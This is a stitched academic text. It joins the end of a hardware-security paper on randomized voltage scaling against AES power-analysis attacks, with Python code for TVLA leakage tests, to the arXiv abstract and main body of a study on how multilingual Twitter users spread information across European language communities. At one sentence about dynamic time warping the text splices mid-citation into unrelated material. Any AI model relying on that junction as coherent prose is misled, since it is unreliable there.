To reduce the computation time and increase the probability of disclosure, we also extract the general region of interest from the synthetic traces before running CPA. Note that the original traces are a set of \(100k\), so to generate two-island traces, half of the traces are used as signal islands while the other half are used as noise islands, combined into a total of \(50k\) traces. If we need more than \(50k\) traces, we repeat this process with different scaling and combining of both the signal and noise traces. This means that the \(50k\) signal plaintexts are repeated, but scaled differently and combined with different noise islands. For other multi-island traces, we applied similar methods to generate synthetic traces.

Figure 2. MTD and PGE of iRDVS under clustering attack. Empty circles indicate unsuccessful attacks, whereas filled circles indicate successful attacks.

### Effectiveness of Elastic Alignment

As described in Section 2, we tested preprocessing the traces using the open-source Python package _fastdtw_ (Kal on several islands operating at once for obfuscation, which requires several encryptions to be in different stages of the AES pipeline at once. While the traditional non-specific fixed-vs-random TVLA test compares the encryption of one fixed plaintext with the encryption of one "random" plaintext, we changed that one encryption to 32 encryptions, with the plaintext of interest (either fixed or random) in the middle of those 32 encryptions and the 31 other plaintexts being random. This ensures that the pipeline is as full as possible.
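The leakage assessment that follows is based on Welch's t-test between the fixed-plaintext and random-plaintext groups; a minimal sketch of that per-sample computation (assuming trace arrays already interpolated to a common length) is shown below.

```python
import numpy as np

def tvla_tscores(fixed_traces, random_traces):
    """Welch's t-score at every time sample between the fixed and random groups.
    Both inputs are (num_traces, num_samples) arrays."""
    mf, mr = fixed_traces.mean(axis=0), random_traces.mean(axis=0)
    vf, vr = fixed_traces.var(axis=0, ddof=1), random_traces.var(axis=0, ddof=1)
    nf, nr = len(fixed_traces), len(random_traces)
    return (mf - mr) / np.sqrt(vf / nf + vr / nr)

def tvla_fails(fixed_traces, random_traces, threshold=4.5):
    """Split each group into two halves and flag a failure only if the threshold
    is exceeded at the same sample in both halves, as in the standard methodology."""
    f1, f2 = fixed_traces[0::2], fixed_traces[1::2]
    r1, r2 = random_traces[0::2], random_traces[1::2]
    t1 = np.abs(tvla_tscores(f1, r1)) > threshold
    t2 = np.abs(tvla_tscores(f2, r2)) > threshold
    return bool(np.any(t1 & t2))
```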
The TVLA analysis was performed on the entire duration of those 32 encryptions. Each trace thus comprises a few thousand samples, with the number of samples varying proportionally with the time the core takes to complete the 32 operations (typically between 5K and 15K samples). To account for traces being different lengths due to natural variation and due to different voltage supply levels affecting the speed of encryption, the traces were linearly interpolated to all be of the same length. Traces are split into two groups of the same number of encryptions, and the t-test is run on both groups, each comprising half of the fixed and half of the random traces. The test then compares the fixed and random traces in each group. The TVLA methodology recommends a confidence value C of 4.5, which means that any samples with t-scores < -4.5 or > 4.5 in both groups indicate that the device is insecure and "fails" with a confidence of 99.99%. To further demonstrate the strength of the iRDVS approach, the same analysis was performed for a C value of 2 and the results are summarized in Table 1. In particular, our TVLA analysis compared four cases: constant voltage, DVS, adjacent iRDVS, and alternating iRDVS, all running on the iRDVS AES core. The constant voltage case runs all encryptions at a constant of 0.8V. The DVS case keeps all islands at the same voltage but changes that voltage randomly to a value between 0.6V and 0.8V for every encryption batch. The adjacent and alternating iRDVS configurations use the full capability of the iRDVS core and change the voltage of each of the four power domains randomly and independently for every encryption batch. These adjacent and alternating cases extend the same cases from the simulation experiments to use four independent voltage domains rather than two. We predict that stages with similar delay maximize overlapping computation and minimize potential timing side channels. For this reason, every other flip-flop is transparent, creating seven pipeline stages, each with two rounds of AES and two voltage islands. ## 9. Conclusions and Future Work According to mathematical analysis and experimental results, the proposed island-based random DVS approach not only maintains the merits of DVS but also introduces misalignment that is resistant to advanced alignment techniques. The proposed unsupervised machine learning based attack is successful with three or fewer islands but increases in difficulty as the number of islands grows. This is in part because the number of voltage supply settings grows combinatorially with the number of independent voltages. An AES iRDVS chip was fabricated to demonstrate the security benefits of the approach, using the industry-accepted TVLA methodology and resulting metric. Further work can be done with larger sample sizes, and work can be done to separate encryption traces precisely so that individual encryptions can be analyzed with TVLA and attacked with CPA or other power analysis attacks. The DVS and adjacent and alternating island-based RDVS cases comprise only a small portion of the potential design space for the iRDVS AES core. Our future work includes finding the most secure configuration as well as finding the configurations that best balances security, performance, and power. Future efforts will also include the addition of voltage generation and randomization circuitry as part of the core. This will further improve the security of the system by reducing the attack surface of the core. ## 10. 
Acknowledgement This work, including the fabrication of the chip presented, was supported by DARPA under the "21 Century Cryptography" program and contract #HR001119C0070.
2304.03797
Bridging Nations: Quantifying the Role of Multilinguals in Communication on Social Media
Social media enables the rapid spread of many kinds of information, from memes to social movements. However, little is known about how information crosses linguistic boundaries. We apply causal inference techniques on the European Twitter network to quantify multilingual users' structural role and communication influence in cross-lingual information exchange. Overall, multilinguals play an essential role; posting in multiple languages increases betweenness centrality by 13%, and having a multilingual network neighbor increases monolinguals' odds of sharing domains and hashtags from another language 16-fold and 4-fold, respectively. We further show that multilinguals have a greater impact on diffusing information less accessible to their monolingual compatriots, such as information from far-away countries and content about regional politics, nascent social movements, and job opportunities. By highlighting information exchange across borders, this work sheds light on a crucial component of how information and ideas spread around the world.
Julia Mendelsohn, Sayan Ghosh, David Jurgens, Ceren Budak
2023-04-07T18:01:25Z
http://arxiv.org/abs/2304.03797v1
# Bridging Nations: ###### Abstract Social media enables the rapid spread of many kinds of information, from memes to social movements. However, little is known about how information crosses linguistic boundaries. We apply causal inference techniques on the European Twitter network to quantify multilingual users' structural role and communication influence in cross-lingual information exchange. Overall, multilinguals play an essential role; posting in multiple languages increases betweenness centrality by 13%, and having a multilingual network neighbor increases monolinguals' odds of sharing domains and hashtags from another language 16-fold and 4-fold, respectively. We further show that multilinguals have a greater impact on diffusing information less accessible to their monolingual compatriots, such as information from far-away countries and content about regional politics, nascent social movements, and job opportunities. By highlighting information exchange across borders, this work sheds light on a crucial component of how information and ideas spread around the world. 1 Footnote 1: Copyright © 2023, Association for the Advancement of Artificial Intelligence (www.aaai.org). All rights reserved. ## 1 Introduction Social media facilitates worldwide diffusion of many forms of content, such as pop culture memes, protest movements, and misinformation Bruns et al. (2013); Nissenbaum and Shifman (2018); Bridgman et al. (2021). However, most connections on social media are formed between people who share a common nationality or language Ugander et al. (2011); Takhteyev et al. (2012). How can information spread around the world when relatively few ties cross geographic and linguistic boundaries? Multilingual users are believed to be an important piece of this puzzle, but understanding how they act as brokers in information flow across language communities remains underexplored Hong et al. (2011). We carry out a set of causal inference studies to quantify how multilingual users influence cross-lingual information exchange across Europe on Twitter and show that the role of multilingual users varies depending on the relationship between countries and the topic of content shared. We identify multilinguals based on the languages of their authored posts and avoid making claims about users' offline language competencies, which is an ideologically and theoretically fraught notion Cheng et al. (2021). Using this operationalization of multilingual, prior work has found that multilingual users tend to have ties (e.g., following links) to multiple distinct language communities, suggesting that they act as bridges in online social networks Eleta and Golbeck (2012); Hale (2014). We expand upon earlier population-level descriptive work by using causal inference techniques, namely propensity score stratification, to more robustly isolate the effects of individual users' multilingual behaviors on several outcomes. This approach is motivated by recent work showing propensity score stratification aligns with experimental results when measuring peer effects in link sharing behavior on social media Eckles and Bakshy (2020). We carry out two analyses using this framework. First, we measure the **structural role** of multilinguals. Here, we quantify the extent to which these users act as bridges using betweenness centrality Freeman (1978). We then measure multilingual users' **communication influence**. 
To do so, we ask how having a multilingual contact impacts the content, specifically URL domains and hashtags, that monolingual users share from other languages. By analyzing information spread across country pairs Figure 1: Consider networks of users from pairs of countries \((C_{x},C_{y})\) (e.g. Germany and Turkey) with dominant languages \(L_{x}\) and \(L_{y}\) (e.g. German and Turkish). Here, multilingual user A posts in both languages. We use causal inference to quantify (i.) the structural role and (ii.) the communication influence of A in cross-lingual information exchange. with different dominant languages, we show how multilingual' influence varies based on relationships between countries. Takhteyev et al. (2012) suggest that offline country relationships (e.g., economic agreements or migration patterns) impact transnational tie frequency online. Extending this conjecture, we hypothesize that the role of multilinguals is not uniform across all country pairs. Specifically, we expect multilinguals to have a bigger impact on country pairs that are more geographically distant or have weaker bonds, in which case these users would serve as gatekeepers of otherwise inaccessible information. We additionally consider actual content, which affects the rate and shape of information diffusion Romero et al. (2011); Tsur and Rappoport (2012). However, this cannot be captured by analyses of network structure alone. Our measures of multilinguals' communication influence overcome this limitation by enabling us to compare effects across content topics. We again hypothesize multilingual users play a larger role in spreading content otherwise inaccessible to an international audience. For example, we expect multilinguals to have a bigger influence on spreading hashtags about local or national politics compared to widespread entertainment sensations. Our contributions are as follows: in large-scale causal inference studies of European Twitter, we show that multilingually-posting users play a vital structural role and communication influence on information diffusion across languages. We compare how multilinguals' influence varies based on relationships between countries and find they have a greater effect among country pairs that are more geographically distant, especially for Western Europeans who post in Eastern European languages. We further measure how the effect of multilinguals is driven by content topic and find that they have the largest influence in spreading content about politics, developing health-related social movements, and job opportunities. Understanding how multilinguals affect information diffusion has immense consequences for online platforms. For example, platforms may focus efforts on empowering multilingual users to spread information that can support knowledge-sharing, collaboration, crisis response, social progress, or other beneficial outcomes Eleta and Golbeck (2014). On the other hand, they may want to discourage multilinguals from sharing dangerous content such as misinformation or abuse. ## 2 Related Work We draw upon prior work on multilinguals' online behavior and information diffusion across social networks. ### Social networks and information diffusion Online social networks tend to have relatively few ties connecting distinct national and linguistic communities, leading to structural holes Ugander et al. (2011); Hale (2012). Spreading novel information across these communities thus relies on bridges that span structural holes Easley and Kleinberg (2010). 
Information spreads the most quickly across long-range bridges, where the intermediary node greatly reduces the shortest path between two other nodes Kossinets et al. (2008). Bridges in a social network play a brokering role that adds to their social capital Burt (2004). We posit that multilinguals play an important role in cross-lingual information exchange because they serve as bridges between language communities. Prior work measures how people influence others to propagate information Guille et al. (2013). For example, people are more likely to share information their friends share, and overall, weak ties (e.g., acquaintances) are more responsible for spreading novel information than strong ties (e.g., close friends) Bakshy et al. (2012). Although multilinguals are not necessarily weak ties, they similarly can act as bridges between communities. Methodologically, we draw from Eckles and Bakshy (2020), who use causal inference techniques, namely propensity score stratification, to measure peer influence on link-sharing behavior and show that their observational estimates are consistent with experimental results. Understanding information diffusion and influential brokers impacts research across disciplines, including the development of activism and protest movements Gonzalez-Bailon et al. (2011); Park et al. (2015); Lee and Murdie (2020), spread of misinformation Bridgman et al. (2021), product adoption Talukdar et al. (2002), and online abuse Sporlein and Schlueter (2021). ### The bridging role of multilinguals Prior work has analyzed connections within and across language communities online Hale (2012, 2014); Samoilenko et al. (2016). Hale (2014) argues that multilingual editors on Wikipedia are important for sharing knowledge across language communities and facilitate access to more diverse knowledge; they are more active than their monolingual counterparts overall and often write the same article across multiple language versions. However, Kim et al. (2016) suggests that language remains a barrier because multilinguals are less engaged and less likely to edit complex content in a non-primary language. While online bloggers primarily link to content within the same language, cross-lingual links do exist, and some bloggers explicitly seek to connect distinct language communities Zuckerman (2008); Hale (2012). Authors of blogs that bridge language communities often tend to be multilingual migrants or language learners Herring et al. (2007). On Twitter, multilinguals disseminate information across different public spheres during events such as the Arab Spring Bruns et al. (2013). Earlier work has also examined the structural role of multilinguals. Kim et al. (2014) count edges between monolingual and multilingual "lingua" groups within multilingual regions on Twitter. They find that monolingual groups tend to be connected via multilingual groups, suggesting that multilingual users are bridges between different language communities. Hale (2014) similarly argues that multilinguals collectively play an important bridging role in the Twitter network. When removing all multilingual nodes, the largest connected component becomes smaller and the number of small components increases, and these changes are significantly larger than if the same number of randomly-selected monolinguals were removed Hale (2014). 
Eleta and Golbeck (2012, 2014) characterize multilingual users' ego-networks as gatekeepers (language communities connected by only a few users) and language bridges (tightly-connected language groups). The authors suggest that gatekeepers are essential individuals for spreading information across linguistic, national, and cultural boundaries. Other work has measured multilinguals' participation in information cascades (resharing chains) on Twitter. Jin (2017) find that multilingual behaviors of the original poster and their followers are predictive of information cascades crossing languages. Chen et al. (2021) compare monolingual and multilingual users in cascade trees of COVID-19 information, develop measures that capture users' bridging roles based on how much they propagate information, and find that multilinguals have a bigger bridging role than monolinguals in nearly two-thirds of information cascades. We build upon prior work in several important ways. While structural analyses suggest that multilinguals are important for cross-lingual information exchange, our causal inference studies quantify the effect of multilingual behaviors on both structural and content-sharing outcomes while accounting for possible confounds such as posting frequency and overall popularity. We further extend the evidence that online multilingual behaviors and connections vary across countries by identifying systematic variation in the effect of multilinguality across country pairs (Kim et al., 2014). ## 3 Data We construct an undirected network with Decahose data from 2012-2020, where edges are mutual "mentions" between users. We consider all pairs of European countries \((C_{x},C_{y})\) with dominant languages \(L_{x}\) and \(L_{y}\), and select countries based on geography and Eurovision participation, a marker of cultural affiliation. Using location inference (Compton, Jurgens, and Allen, 2014), we extract network subsets for all \((C_{x},C_{y})\) pairs where nodes are users from \(C_{x}\) or \(C_{y}\). We use tweets from 2018-2020 for multilingualism and content measures due to limited text availability. DefinitionsEach pair of countries \((C_{x},C_{y})\) is a _multilingual country pair (MCP)_ with dominant languages \(L_{x}\) and \(L_{y}\). Users who post only in \(L_{x}\) are \(L_{x}\)_monolinguals_ and users who post in both \(L_{x}\) and \(L_{y}\) are \((L_{x},L_{y})\)_multilinguals_. Within each \((C_{x},C_{y})\) network we separately measure the role of \((L_{x},L_{y})\) multilinguals located in \(C_{x}\) and \(C_{y}\), which we refer to as _loci_. In Figure 1, _(Germany, Turkey)_ is an MCP, and we measure the role of _(German, Turkish)_ multilinguals within each locus _Germany_ and _Turkey_. Language identificationTwitter posts present a challenge to automated language identification (LangID) due to their short length, informal style, and lack of ground truth labels (Graham, Hale, and Gaffney, 2014; Williams and Dagli, 2017). We use Twitter's built-in language detector because it is computationally efficient for a massive dataset, requires few additional resources, and is trained on in-domain data.1 Footnote 1: [https://blog.twitter.com/engineering/en_us/a/2015/](https://blog.twitter.com/engineering/en_us/a/2015/) evaluating-language-identification-performance We validate our decision with a comparison to 5 popular LangID packages: langdetect2, langid.py (Lui and Baldwin, 2012), and CLD23 use probabilistic models, while fastText (Joulin et al., 2016) and CLD34 use neural networks. 
As in prior LangID evaluations, we randomly sample 1K tweets from 32 countries written in that country's dominant language, as labeled by Twitter (Graham, Hale, and Gaffney, 2014; Lamprinidis et al., 2021). Like Graham, Hale, and Gaffney (2014), we calculate intercoder agreement between all pairs of models. Table S3 (Supplemental Material) shows that Twitter's LangID has a high agreement with other models, even at higher rates than they agree with each other. Footnote 2: [https://github.com/shuyo/language-detection](https://github.com/shuyo/language-detection) Footnote 3: [https://github.com/CLD2Owners/cld2](https://github.com/CLD2Owners/cld2) Footnote 4: [https://github.com/google/cld3](https://github.com/google/cld3) Like most LangID models, Twitter's LangID has relatively low coverage of the world's languages and may struggle to distinguish similar languages (Lui and Baldwin, 2014; Williams and Dagli, 2017). We mitigate these limitations by selecting multilinguals and MCPs so that our analyses are not overly sensitive to individual prediction errors. Identifying multilingual usersFollowing Eleta and Golbeck (2014), an individual uses language \(L\) if at least 10% of their posts containing original content are written in \(L\) (i.e., excluding retweets but including quote tweets and replies). A user is _monolingual_ if one language passes the 10% threshold, and _multilingual_ in the \((C_{x},C_{y})\) network if both \(L_{x}\) and \(L_{y}\) pass this threshold. Following Kim et al. (2014), we collect language information for all users with at least five posts in the Decahose. We additionally exclude users if over 20% of their tweets are in unidentified languages because our calculations for language use may be less accurate. We set these thresholds so that estimates of users' multilingualism are more reliable and robust to language prediction errors of individual tweets. We emphasize that our operationalization of multilingualism is based solely on users' expression on Twitter; we do not make claims about language knowledge or offline behavior. Selecting network subsets for analysisFrom an initial set of 50 European countries, we exclude 18 after three filtering steps. First, we remove six micro-states with area under 500km\({}^{2}\) because Compton, Jurgens, and Allen (2014)'s reported errors suggest that location inference is less reliable within such small areas. Second, we restrict our analysis to countries with a single official or dominant language (i.e., used by at least 70% of the population), removing eight more countries.5 This step is necessary for our problem formulation, which focuses on information spread across borders. The study of users within highly-multilingual countries is beyond the scope of this paper. Third, we calculate the distribution of tweets authored by users from each country and exclude four countries where the majority of tweets' languages are unidentified or no tweets are identified as written in the country's dominant language. See Supplemental Material Table S1 for the list of included and filtered countries. We include an MCP \((C_{x},C_{y})\) if: (1) \(C_{x}\) and \(C_{y}\) have different dominant languages, and (2) the \((C_{x},C_{y})\) network is sufficiently large to rigorously estimate causal effects. 
Specifically, an MCP network is included if it has at least 100 \(L_{x}\) and \(L_{y}\) monolinguals, 20 \((L_{x},L_{y})\) multilingual, and 100 users with at least 1 \((L_{x},L_{y})\) multilingual neighbor.6 See Supplemental Material Table S2 for included MCPs. Footnote 6: While we deem such thresholds necessary for precise causal effect estimation, we acknowledge the arbitrariness of these numbers as a limitation of our study. Descriptive statisticsOur dataset contains information for 12.6M users from 32 countries. 8.0M users pass the thresholds for posting activity and language identifiability and are considered for analysis. Of these users, 1.1 million (13.6%) tweet in both their country's dominant language and another European language. Norway has the largest percentage of bilingual users (46.9%), while the United Kingdom has the least (3.3%). 232 MCP network subsets were selected based on our inclusion criteria, covering 30 European countries and 7.7 million unique users (Georgia and Moldova were considered, but no MCP network containing these countries was included). MCP networks range in size from 4.7K nodes _(Latvia, Lithuania)_ to 3.6M nodes _(United Kingdom, Turkey)_, with a median size of 319K nodes. ## 4 Problem Formulation Adopting the Neyman-Rubin framework of potential outcomes Holland (1986), we isolate the effect of multilingual by addressing the counterfactual: how would a multilingual user \(u\)'s influence be different if \(u\) were monolingual? Each study's details vary (Table 1), but all have the same idea: we define a set of _units_ (users), some of whom receive a _treatment_ indicating multilingual behavior, and we estimate an _outcome_ variable related to influence on information exchange across languages. ### Measures of influence Are multilinguals well-positioned in networks to spread information? In Study 1, we quantify their structural role by estimating the effect of multilingual posting on betweenness centrality. A measure of the proportion of shortest paths that must go through an intermediary node, betweenness centrality quantifies the extent to which the intermediary is an information broker (Freeman, 1978). Studies 2 and 3 focus on multilingual' influence on content flows across languages. If an \(L_{x}\) monolingual has a multilingual neighbor in the \((C_{x},C_{y})\) network, how much more likely are they to share \(L_{y}\) content? We consider two forms of content: URL domains and hashtags Hong (2011). Betweenness centrality (Study 1)For each \((C_{x},C_{y})\) MCP, we consider a sample of users from locus \(C_{x}\) who post in \(L_{x}\). The treatment is if a user is multilingual in \((L_{x},L_{y})\), and the outcome is the user's betweenness centrality in the \((C_{x},C_{y})\) network, scaled by \(10^{6}\) and log-transformed. Domain sharing (Study 2)We first identify URL domains associated with each language. We filter out the 200 overall most-frequent domains. Like stop word removal Jurafsky and Martin (2000), excluded domains are largely uninformative for measuring content sharing across languages (e.g. _instagram.com_, _unfollowspy.com_). To account for sampling variability, we exclude domains that appear fewer than ten times Monroe et al. (2008). We then consider "domains associated with \(L_{x}\)" to be the 100 domains most overrepresented in \(L_{x}\) tweets (excluding retweets) relative to all European tweets based on the weighted log odds ratio with an informative Dirichlet prior Monroe et al. (2008). 
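A sketch of that scoring step is given below; it follows the standard Monroe et al. (2008) formulation, with the prior scale and the use of the non-\(L_{x}\) remainder as the comparison corpus being our assumptions rather than details stated in the text.

```python
import numpy as np

def weighted_log_odds(counts_lx, counts_all, prior_scale=10.0):
    """Z-scored weighted log-odds ratio with an informative Dirichlet prior,
    scoring how overrepresented each domain/hashtag is in L_x tweets relative
    to the full European corpus (counts_all is assumed to include counts_lx)."""
    n_lx = sum(counts_lx.values())
    n_rest = sum(counts_all.values()) - n_lx
    total = sum(counts_all.values())
    scores = {}
    for w, c_all in counts_all.items():
        y_lx = counts_lx.get(w, 0)
        y_rest = c_all - y_lx
        a_w = prior_scale * c_all / total          # informative prior mass
        delta = (np.log((y_lx + a_w) / (n_lx + prior_scale - y_lx - a_w))
                 - np.log((y_rest + a_w) / (n_rest + prior_scale - y_rest - a_w)))
        var = 1.0 / (y_lx + a_w) + 1.0 / (y_rest + a_w)
        scores[w] = delta / np.sqrt(var)
    return scores  # take the 100 highest-scoring items as 'associated with L_x'
```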
For each MCP \((C_{x},C_{y})\) and locus \(C_{x}\), the sample is the set of \(L_{x}\) monolinguals from \(C_{x}\). A user \(u\) is treated if they have at least one \((L_{x},L_{y})\) multilingual neighbor, and the outcome is whether any of \(u\)'s Decahose tweets contain at least one domain associated with \(L_{y}\), the language \(u\) does _not_ use. Note that we exclude retweets for language-based measures, such as identifying multilinguals and language-specific domains/hashtags, but include retweets for information-sharing measures because they are an important component of information diffusion on Twitter.

| | Study 1 (Structural Role) | Study 2 (Communication Influence) | Study 3 (Communication Influence) |
| --- | --- | --- | --- |
| Units | \(C_{x}\) users posting in \(L_{x}\) | Monolinguals in \(L_{x}\) from \(C_{x}\) | Monolinguals in \(L_{x}\) from \(C_{x}\) |
| Treatment | Posting multilingually in \((L_{x},L_{y})\) | Having \(\geq 1\) \((L_{x},L_{y})\) multilingual neighbor | Having \(\geq 1\) \((L_{x},L_{y})\) multilingual neighbor |
| Outcome | Betweenness centrality | Sharing domain from \(L_{y}\) | Sharing hashtag from \(L_{y}\) |

Table 1: Overview of problem formulation for causal inference studies. Each study focuses on the effect of multilingualism on cross-lingual information exchange, but defines different samples, treatments, and outcomes.

Figure 2: General design for causal inference studies Ho et al. (2007); Stuart (2010). We first estimate the propensity of each unit to receive treatment and use these scores to divide the sample into 25 strata. We then compare treated and untreated units within each stratum through a weighted regression to estimate the causal effect of the treatment.

**Hashtag sharing (Study 3)** We similarly identify hashtags associated with each language. Unlike domains, language-associated hashtags can change rapidly because they may refer to short-term events, such as elections, protests, or upcoming TV shows. We thus separate the Decahose data into 60 14-day intervals, and use the log-odds ratio with informative Dirichlet priors to identify \(H_{x}^{i}\), the set of 100 hashtags most associated with \(L_{x}\) in interval \(i\), after again filtering out the 200 most-frequent hashtags (e.g. _#blog_, _#radio_), those occurring fewer than ten times in \(i\), and excluding retweets. A user \(u\) "shares" a hashtag from \(L_{x}\) if any of \(u\)'s Decahose tweets contain at least one hashtag \(h\in H_{x}^{i}\) during \(i\) or the subsequent period \(i+1\) (including retweets). Resulting hashtags reflect entertainment, sports, politics, and everyday life; see Supplemental Material Table S4 for examples of language-specific domains and hashtags.

### Causal inference setup

We use propensity score stratification to estimate the causal effects of multilingual treatment variables on information diffusion outcomes [10]. Our procedure, shown in Figure 2, closely follows the guidelines provided by Stuart [10] and MatchIt [11]. We first fit a logistic regression model to calculate propensity scores, which represent the probability of receiving treatment as a function of the specified covariates [10].
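The paper implements this step with the MatchIt R package; the sketch below is a rough Python analogue of the same idea (a propensity model, quantile-based strata, and a covariate balance check), with the simple unweighted balance statistic and all variable names being our assumptions.

```python
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression

def stratify_by_propensity(df, covariates, treatment_col, n_strata=25):
    """Estimate propensity scores, assign units to quantile strata, and report
    the absolute standardized mean difference (SMD) for each covariate."""
    X, z = df[covariates].values, df[treatment_col].values
    propensity = LogisticRegression(max_iter=1000).fit(X, z).predict_proba(X)[:, 1]
    out = df.assign(propensity=propensity,
                    stratum=pd.qcut(propensity, q=n_strata, labels=False,
                                    duplicates="drop"))
    smd = {}
    for c in covariates:     # balance check: aim for SMD < 0.1 after adjustment
        t, u = out.loc[z == 1, c], out.loc[z == 0, c]
        pooled = np.sqrt((t.var(ddof=1) + u.var(ddof=1)) / 2)
        smd[c] = abs(t.mean() - u.mean()) / pooled
    return out, smd
```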
Covariates are shared for all studies and capture aspects of users' Twitter behavior that may affect our outcomes [23]. These include verified status, network degree, follower and following counts, account age, number of tweets in the Decahose sample, "favorites" count, and post rate, all log-scaled. Covariates for each user are based on their most recent tweet in our sample. We then conduct propensity score stratification where units are separated into 25 strata based on propensity scores and verify sufficient balance for all covariates with absolute standardized mean difference less than 0.1 [11]. Although five strata have commonly been used in practice, more strata can yield less biased estimates for larger sample sizes [1]. Propensity score estimation, stratification, and balance checks are performed using the MatchIt R package [11]. We compare treated and untreated units within each stratum by fitting a regression of each outcome on treatment status, weighted by the matching weights. In particular, we estimate the average treatment effect on the treated (ATT); this estimates how the outcome among treated units differs from the counterfactual scenario in which they are not treated [23]. For all studies, we include covariate adjustment to control for direct effects that pre-treatment covariates may have on the outcome. Because each study defines units, treatment, and outcomes differently, the specific details of ATT estimation vary. In Study 1, we fit a linear regression after propensity score stratification to estimate the difference in (scaled and log-transformed) betweenness centrality. Here, multilingualism increases betweenness centrality if ATT \(>\) 0. In Studies 2 and 3, the outcomes are binary so we use logistic regression to estimate ATT as an odds ratio, a measure used in prior work to compare domain and hashtag sharing behaviors across languages [11]. For some treated user \(u\) who is monolingual in \(L_{x}\), the ATT estimates the odds that \(u\) shares a domain (hashtag) associated with \(L_{y}\) divided by the odds that \(u\) would share a domain (hashtag) associated with \(L_{y}\) in the counterfactual scenario where \(u\) is not treated. ATT \(>1\) indicates that having a multilingual \((L_{x},L_{y})\) contact increases an \(L_{x}\) monolingual's likelihood of sharing domains (hashtags) from \(L_{y}\). In each study, we estimate the ATT on aggregate data from both loci in all MCP networks in order to get a single causal estimate of the role of multilinguals in cross-lingual information exchange. We additionally estimate separate ATT values for units from each locus in each MCP network, and analyze the variation across locus-specific causal effects later. To ensure sufficient data across strata, we only estimate locus-specific causal effects for locus \(C_{x}\) in MCP \((C_{x},C_{y})\) if there are at least 100 treated units. Furthermore, we only include locus-specific causal effects for Studies 2 and 3 if at least 100 units in the combined treated and untreated sample (all \(L_{x}\) monolinguals) have an outcome of 1 (share at least one domain or hashtag from \(L_{y}\)). ## 5 Overall effects of multilingual behavior All three studies support our hypothesis that multilinguals play an important role in cross-lingual information exchange.
**Betweenness centrality (Study 1)** Multilingual \((L_{x},L_{y})\) users have higher betweenness centrality in the \((C_{x},C_{y})\) network than their monolingual peers, suggesting that these users serve as local bridges and thus are well-positioned to spread novel information across the network [12, 1]. The overall ATT is 0.034 (\(p<0.0001\), with robust standard error estimation). In other words, multilingual posting increases the outcome of log-transformed betweenness by 0.034, which corresponds to a 13.5% increase in betweenness centrality. **URL domain sharing (Study 2)** Having a multilingual \((L_{x},L_{y})\) friend increases the odds of a monolingual \(L_{x}\) user sharing a domain from \(L_{y}\) by a factor of 15.57 (\(p<0.0001\)). For interpretability, we also estimate the average marginal effect with a marginal effects model on the logistic regression used for estimating the ATT as an odds ratio. We find that having a \((L_{x},L_{y})\) friend increases an \(L_{x}\) monolingual's probability of sharing an \(L_{y}\) domain by 20.0%. **Hashtag sharing (Study 3)** Having a multilingual \((L_{x},L_{y})\) friend significantly increases the odds of an \(L_{x}\) monolingual sharing a hashtag from \(L_{y}\) by a factor of 3.98 (\(p<0.0001\)). Through estimating the average marginal effect, we find that this corresponds to an increase in the probability of sharing an \(L_{y}\) hashtag by 32.7%. While the odds ratio for hashtag sharing is lower than for domains, the probability increase is greater because extremely low domain-sharing probabilities result in inflated odds ratios. \begin{table} \begin{tabular}{c c c c} \hline \hline & \multicolumn{3}{c}{Outcome} \\ \hline & Betweenness & Domain & Hashtag \\ & Centrality & Sharing & Sharing \\ & (Study 1) & (Study 2) & (Study 3) \\ \hline \# Eligible MCPs & 214 & 158 & 199 \\ \# Eligible Loci & 317 & 205 & 284 \\ \% Loci w/ sig. pos ATT & 46.37\% & 56.10\% & 50.00\% \\ \% Loci w/ no sig. ATT & 51.42\% & 40.49\% & 46.48\% \\ \% Loci w/ sig. neg ATT & 2.21\% & 3.41\% & 3.52\% \\ \hline \hline \end{tabular} \end{table} Table 2: Summary of causal effect of posting multilingually (Study 1) or having a multilingual friend (Studies 2 and 3) for users in each country (locus) across all multilingual country pairs (MCPs). Despite considerable variation across loci, each treatment has positive effects on information diffusion-related outcomes far more often than negative effects. We estimate the average treatment effect on the treated (ATT), and significance is determined at \(p<0.05\) with robust standard error estimation. Table 2 summarizes locus-specific causal effect estimates. Due to minimum inclusion criteria, we only estimate ATTs for a subset of all 464 loci corresponding to 232 MCPs. All three treatments increase information-sharing outcomes in about half of the loci, and decrease outcomes in under 4% of loci. Locus-specific estimates reinforce that multilinguals facilitate information exchange across language boundaries. However, the distribution of positive, negative, and insignificant effects across loci as shown in Table 2 suggests wide variation across MCPs and loci. ## 6 Variation across country pairs All three studies show that multilingual behaviors increase cross-lingual information exchange. However, locus-specific causal estimates indicate substantial heterogeneity in the magnitude of their effects across MCPs and loci.
We conduct regression analyses to characterize how geographic, demographic, economic, political, and linguistic relationships between country pairs correlate with the effects of multilingual behaviors on European Twitter. ### Regression Setup We fit linear regression models to characterize how the causal effects of multilinguals vary across countries. For a given MCP \((C_{x},C_{y})\) and locus \(C_{x}\), we define 3 dependent variables: the estimated causal effects (ATT) of multilingual behavior in each of the 3 described studies. Independent variables capture relationships between \(C_{x}\) and \(C_{y}\). **Demographic variables** include the population ratio of \(C_{x}\) to \(C_{y}\) from 2019 based on CEPII's Gravity Dataset [1, 2]. Using 2017 World Bank migration data, we consider the fraction of \(C_{x}\)'s population born in \(C_{y}\), \(C_{y}\)'s population born in \(C_{x}\), and each country's population who are foreign-born.7 Footnote 7: worldbank.org/en/topic/migrationremittancesdiasporaissues/brief/migration-remittances-data **Geographic variables** are the distance (in km) between \(C_{x}\) and \(C_{y}\)'s population centers and time difference: the number of hours \(C_{y}\) is ahead (further east) of \(C_{x}\). **Economic variables** include i.) the ratio of \(C_{x}\) to \(C_{y}\)'s GDP per capita, ii.) if \(C_{x}\) and \(C_{y}\) are in an RTA (Regional Trade Agreement, which includes the EU), and ii.) trade flow between \(C_{x}\) and \(C_{y}\) averaged over both country's reports and both directions, normalized by the total population of both countries. Geographic and economic variables use 2019 data from CEPII's Gravity Dataset. **Political variables**, specifically material conflict between \(C_{x}\) and \(C_{y}\), are determined by querying the GDELT event database [1]. These include the percent of \(C_{x}\)'s external conflict actions inflicted on \(C_{y}\), and \(C_{y}\)'s external conflict actions inflicted on \(C_{x}\). The last fixed effect is **linguistic distance** between \(L_{x}\) and \(L_{y}\) using Glottolog [1]. Inspired by Samoilenko et al. [1]'s measurement of shared language families, we define a 4-level measurement of linguistic distance between \(L_{x}\) and \(L_{y}\): i.) no relationship (e.g. Spanish and Hungarian), ii.) in the same primary family (e.g. German and Polish are Indo-European), iii.) in the same branch (e.g. English and Swedish are Germanic), and iv.) in the same sub-branch (e.g. Spanish and Italian are Romance).8 Footnote 8: We do not use graph-based measurements of distance because there is wide variation across language branches’ structures due to 